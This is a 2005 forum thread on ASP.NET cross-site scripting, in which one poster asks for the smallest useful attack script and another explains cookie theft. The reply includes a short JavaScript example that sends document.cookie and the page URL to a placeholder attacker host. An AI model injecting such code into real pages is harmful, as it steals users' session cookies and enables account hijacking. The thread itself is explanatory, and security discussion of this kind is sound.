Cross site scripting

Discussion in 'ASP .Net' started by =?Utf-8?B?QnJhZCBRdWlubg==?=, Apr 27, 2005.

  1. This is not an ASP.NET question per se. I'm asking since a lot of smart
    people lurk here.

    What is the smallest script that would be useful to an attacker?
    =?Utf-8?B?QnJhZCBRdWlubg==?=, Apr 27, 2005
    #1
    1. Advertising

  2. =?Utf-8?B?QnJhZCBRdWlubg==?=

    Brock Allen Guest

    XSS is typically used to steal cookies and send them to the attacker so they
    can spoof your session or identity on the site it was stolen from. As for
    the code, well, I'm not a h4X0r, so I don't know what else it'd be beyond:

    var xmlRequest = new XMLHttpRequest();
    xmlRequest.open("GET", "http://haxor.org?Cookie=" + document.cookie + "&URL="
    + document.url, false);
    xmlRequest.send(null);

    But this gives you the idea. Again, there are probabaly more clever/malicious
    things that can be done.

    -Brock
    DevelopMentor
    http://staff.develop.com/ballen



    > This is not an ASP.NET question per se. I'm asking since a lot of
    > smart people lurk here.
    >
    > What is the smallest script that would be useful to an attacker?
    >
    Brock Allen, Apr 28, 2005
    #2
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Scott M.

    Cross-Site Scripting...

    Scott M., Dec 22, 2003, in forum: ASP .Net
    Replies:
    7
    Views:
    3,371
    Steven Cheng[MSFT]
    Dec 24, 2003
  2. Earl Teigrob
    Replies:
    0
    Views:
    532
    Earl Teigrob
    Feb 18, 2004
  3. Replies:
    3
    Views:
    792
  4. Qaurk Noble

    Preventing Cross Site Scripting

    Qaurk Noble, Dec 11, 2003, in forum: Java
    Replies:
    0
    Views:
    400
    Qaurk Noble
    Dec 11, 2003
  5. Replies:
    3
    Views:
    762
    Lee Harr
    Jun 16, 2006
Loading...

Share This Page